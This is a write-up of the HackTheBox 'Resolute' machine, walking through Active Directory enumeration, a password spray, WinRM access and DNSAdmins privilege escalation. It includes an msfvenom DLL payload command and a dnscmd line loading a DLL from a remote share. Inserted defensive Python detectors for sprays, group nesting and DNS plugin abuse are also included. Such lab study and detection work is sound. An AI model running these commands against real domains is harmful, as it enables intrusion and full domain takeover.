2021-12-26 01:18:24 +05:00


HackTheBox - Resolute

NMAP

PORT      STATE SERVICE      VERSION        
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-15 09:37:43Z)                      
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)               
464/tcp   open  kpasswd5?         
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0     
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)    
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found                    
9389/tcp  open  mc-nmf       .NET Message Framing        
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0             
|_http-title: Not Found                      
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49862/tcp open  unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Port 88 tells us this is Active Directory: Kerberos, which is responsible for authenticating users, runs on that port. Knowing this helps us decide how to enumerate and what steps to take next.

SMB/LDAP

Since SMB is enabled, we can try to log in as an anonymous user, if anonymous access isn't disabled.

Now we can try to enumerate LDAP, since from there we can get information such as user names, group names and the domain name of the machine, using either enum4linux-ng or windapsearch.

We have the usernames; we just need to grep for them and then run these names through kerbrute to find which are valid domain users. If one of these users has pre-authentication disabled, we can get a hash for that user, which we can crack.

We can filter this output to grab only the usernames using awk.

Running kerbrute, we found that 24 of the 27 usernames are valid.

Foothold

If we go back to the enum4linux results, we see a password in the description field of the marko user.

But this password didn't work for him.

So the next option is simply to perform a password spray attack.
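From the defender's side, a spray like the one above has a recognisable shape in domain controller logon telemetry: one source address failing against many distinct accounts, each tried only once or twice to stay under the lockout threshold. The following is an added example, not part of the original write-up; the event records, hosts and addresses are constructed, and the 4771/4625 field layout is a simplified SIEM-style flattening.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon records in the shape a SIEM exports from a domain
# controller: Security event 4771 (Kerberos pre-auth failed, status 0x18 = wrong
# password) and 4625 (NTLM/SMB logon failure). Hosts and addresses are made up.
EVENTS = [
    {"time": "2021-12-15T09:40:01", "event_id": 4771, "account": "ryan",    "source": "10.10.14.5"},
    {"time": "2021-12-15T09:40:01", "event_id": 4771, "account": "marko",   "source": "10.10.14.5"},
    {"time": "2021-12-15T09:40:02", "event_id": 4771, "account": "melanie", "source": "10.10.14.5"},
    {"time": "2021-12-15T09:40:02", "event_id": 4771, "account": "user4",   "source": "10.10.14.5"},
    {"time": "2021-12-15T09:40:03", "event_id": 4771, "account": "user5",   "source": "10.10.14.5"},
    {"time": "2021-12-15T09:40:03", "event_id": 4771, "account": "user6",   "source": "10.10.14.5"},
    # one user mistyping their own password three times is noise, not a spray
    {"time": "2021-12-15T09:41:00", "event_id": 4625, "account": "user7", "source": "10.10.10.50"},
    {"time": "2021-12-15T09:41:07", "event_id": 4625, "account": "user7", "source": "10.10.10.50"},
    {"time": "2021-12-15T09:41:15", "event_id": 4625, "account": "user7", "source": "10.10.10.50"},
]

def detect_spray(events, window=timedelta(minutes=5), min_accounts=5, max_per_account=2):
    """Return {source: sorted accounts} for each source that failed against at
    least `min_accounts` distinct accounts within `window`, trying each of them
    no more than `max_per_account` times (the low-and-wide shape a spray takes
    to stay under the lockout threshold)."""
    by_source = defaultdict(list)
    for e in events:
        if e["event_id"] in (4625, 4771):
            by_source[e["source"]].append((datetime.fromisoformat(e["time"]), e["account"]))
    hits = {}
    for source, attempts in by_source.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):   # slide the window over each start point
            per_account = defaultdict(int)
            for t, acct in attempts[i:]:
                if t - start > window:
                    break
                per_account[acct] += 1
            sprayed = sorted(a for a, n in per_account.items() if n <= max_per_account)
            if len(sprayed) >= min_accounts:
                hits[source] = sprayed
                break
    return hits
```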

We can list the SMB shares.

The NETLOGON share seems to have nothing in it

So I tried to see if I could kerberoast any user associated with an SPN, but there didn't seem to be any such accounts.

Then I realized that I hadn't checked WinRM.

And we can in fact use it to get a remote session with evil-winrm.

To enumerate AD, we have two options: running the SharpHound PowerShell script or the Python BloodHound ingestor.

Import the JSON files this script generates, then search for the username so we can mark it as pwned and see whether we can find a path to higher-value targets by running the pre-built queries.

Running the query, we don't see anything interesting we can do with this user.

But if we look at the user ryan, he is in the Contractors group.

And if we explore this group further, it is itself a member of the DNSAdmins group.
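The nesting BloodHound surfaces here (ryan is in Contractors, Contractors is in DNSAdmins) is exactly what an auditor wants to answer for every privileged group: who ends up in it through any chain of membership, and by which chain. The block below is an added example, not the write-up's code nor BloodHound's; it walks MemberOf-style edges with a cycle-safe BFS over a constructed edge list (only the ryan/Contractors/DNSAdmins nesting mirrors the box).

```python
from collections import defaultdict, deque

# Constructed MemberOf edges (member -> group) in the NAME@DOMAIN form BloodHound
# uses; only the ryan -> Contractors -> DnsAdmins nesting mirrors the box, the
# rest is made up, including a deliberate cycle (which AD group nesting permits).
MEMBER_OF = [
    ("RYAN@MEGABANK.LOCAL", "CONTRACTORS@MEGABANK.LOCAL"),
    ("CONTRACTORS@MEGABANK.LOCAL", "DNSADMINS@MEGABANK.LOCAL"),
    ("RYAN@MEGABANK.LOCAL", "REMOTE MANAGEMENT USERS@MEGABANK.LOCAL"),
    ("MELANIE@MEGABANK.LOCAL", "REMOTE MANAGEMENT USERS@MEGABANK.LOCAL"),
    ("MARKO@MEGABANK.LOCAL", "TEAM-A@MEGABANK.LOCAL"),
    ("TEAM-A@MEGABANK.LOCAL", "TEAM-B@MEGABANK.LOCAL"),
    ("TEAM-B@MEGABANK.LOCAL", "TEAM-A@MEGABANK.LOCAL"),
]

def _adjacency(edges, reverse=False):
    """member -> its direct groups, or with reverse=True group -> its direct members."""
    adj = defaultdict(set)
    for member, group in edges:
        adj[group if reverse else member].add(member if reverse else group)
    return adj

def effective_members(group, edges):
    """Every principal (user or nested group) that ends up in `group` through any
    chain of nesting. BFS with a seen-set, so cycles terminate."""
    children = _adjacency(edges, reverse=True)
    seen, queue = {group}, deque([group])
    while queue:
        for member in children[queue.popleft()]:
            if member not in seen:
                seen.add(member)
                queue.append(member)
    return seen - {group}

def membership_path(principal, group, edges):
    """Shortest nesting chain from `principal` to `group`, or None: the 'why is
    ryan in DnsAdmins?' question a BloodHound path query answers."""
    parents = _adjacency(edges)
    prev, queue = {principal: None}, deque([principal])
    while queue:
        node = queue.popleft()
        if node == group:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for parent in parents[node]:
            if parent not in prev:
                prev[parent] = node
                queue.append(parent)
    return None
```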

Privilege Escalation (ryan)

Once on the machine through evil-winrm, we can see a hidden directory called PSTranscripts using dir -Force.

Going into this directory, we find a text file.

Reading this file gives us the password for ryan.

Privilege Escalation (Administrator)

We know that ryan is a member of the Contractors group, and that group is a member of the DNSAdmins group, so ryan is effectively a member of DNSAdmins as well.

This can lead to privilege escalation to SYSTEM: with permission to control the DNS service, we can load a malicious DLL by generating it with msfvenom, hosting it on an SMB share, registering it with dnscmd, then stopping the DNS service with sc.exe stop dns and starting it again with sc.exe start dns so that the service starts with our malicious DLL loaded.

Generating the DLL file

Using Impacket's smbserver to start an SMB server

Now, there was an issue with this box (I don't know if others hit it too): when I was following this article for abusing the DNSAdmins group, it would neither give me the reverse shell nor execute the command from the payload msfvenom -p windows/x64/exec cmd='net group "Administrator" melanie /add' -f dll > dns.dll

Also, when we downloaded the DLL onto the machine it would be removed within a minute, so we needed to be quick. The way I got SYSTEM was: I stopped the DNS service first, then loaded the DLL, then started the DNS service, saw the connection come in on smbserver and got a shell on netcat.
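From the defender's side, the chain described above (point the DNS server at a plugin DLL, then stop and start the service so it loads) leaves a distinctive trail in process-creation and registry telemetry, and the detection does not care about the order the author had to use. This is an added example, not from the write-up: the Sysmon-style records, host, account, times and share path are constructed; the dnscmd option and the ServerLevelPluginDll registry value it sets are the real artefacts of this technique.

```python
import re
from datetime import datetime, timedelta

# Constructed telemetry in the shape of Sysmon event 1 (process creation) and
# event 13 (registry value set), flattened as a SIEM would. Host, account, times
# and the share path are made up; the command sequence mirrors the write-up.
EVENTS = [
    {"time": "2021-12-15T10:02:10", "host": "RESOLUTE", "id": 1, "user": "MEGABANK\\ryan",
     "cmd": "sc.exe stop dns"},
    {"time": "2021-12-15T10:02:20", "host": "RESOLUTE", "id": 1, "user": "MEGABANK\\ryan",
     "cmd": r"dnscmd.exe resolute /config /serverlevelplugindll \\10.10.14.5\share\dns.dll"},
    {"time": "2021-12-15T10:02:21", "host": "RESOLUTE", "id": 13, "user": "MEGABANK\\ryan",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll",
     "value": r"\\10.10.14.5\share\dns.dll"},
    {"time": "2021-12-15T10:02:30", "host": "RESOLUTE", "id": 1, "user": "MEGABANK\\ryan",
     "cmd": "sc.exe start dns"},
    {"time": "2021-12-15T11:00:00", "host": "RESOLUTE", "id": 1, "user": "MEGABANK\\Administrator",
     "cmd": "sc.exe query dns"},   # benign: querying the service is not a restart
]

PLUGIN_CMD = re.compile(r"dnscmd(?:\.exe)?\b.*/config\s+/serverlevelplugindll\s+(\S+)", re.I)
SERVICE_CMD = re.compile(r"\b(?:sc|net)(?:\.exe)?\s+(?:stop|start)\s+dns\b", re.I)
PLUGIN_KEY = r"\services\dns\parameters\serverlevelplugindll"

def detect_plugin_dll_abuse(events, window=timedelta(minutes=10)):
    """Return one finding per ServerLevelPluginDll change (via dnscmd or a direct
    registry write). The change alone is high severity; a DNS service stop or
    start by the same account on the same host inside `window` makes it critical,
    and a UNC path tells you the DLL is being fetched from a remote share."""
    stamped = [(datetime.fromisoformat(e["time"]), e) for e in events]
    findings = []
    for t, e in stamped:
        if e["id"] == 1 and (m := PLUGIN_CMD.search(e["cmd"])):
            dll = m.group(1)
        elif e["id"] == 13 and e["key"].lower().endswith(PLUGIN_KEY):
            dll = e["value"]
        else:
            continue
        restarts = [e2["cmd"] for t2, e2 in stamped
                    if e2["id"] == 1 and e2["host"] == e["host"] and e2["user"] == e["user"]
                    and abs(t2 - t) <= window and SERVICE_CMD.search(e2["cmd"])]
        findings.append({"host": e["host"], "user": e["user"], "dll": dll,
                         "remote_dll": dll.startswith("\\\\"),
                         "severity": "critical" if restarts else "high",
                         "service_restarts": restarts})
    return findings
```

Beyond alerting, the same registry value is what an administrator should audit on every DNS server: on a healthy domain controller it is absent or empty.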

To get a proper shell, we can now just add ryan to the Domain Admins group or the local Administrators group.

We can verify it with net user ryan

Again, we need to be quick to dump the hashes and perform a pass-the-hash attack, because the box reverts the changes.

References